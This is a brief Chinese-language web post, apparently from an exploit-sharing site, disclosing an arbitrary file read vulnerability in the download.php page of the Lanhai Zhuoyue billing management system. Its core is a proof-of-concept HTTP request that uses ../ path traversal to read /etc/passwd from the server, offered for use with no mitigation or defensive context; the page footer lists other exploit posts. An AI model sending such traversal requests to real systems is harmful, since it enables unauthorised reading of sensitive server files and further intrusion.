# 蓝海卓越计费管理系统 任意文件读取漏洞
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.
poc:
“`
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host:
“`
via:peiqi
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
相关推荐
作者
最近一周热门文章
1会员必看手册(1.8.6版本 25.12.1更新)
2025年12月1日2CVE-2025-55182 dify 无条件rce
2025年12月5日3会员手册版本更新(恢复md5解密功能)
2025年12月5日4普华科技PowerPms ForgotPassword 存在sql注入
2025年12月3日5无境靶场练习:win11通关vulntarget-b
2025年12月1日6XWiki Platform 文件读取 (CVE-2025-55749)
2025年12月4日标签云
请登录后查看评论内容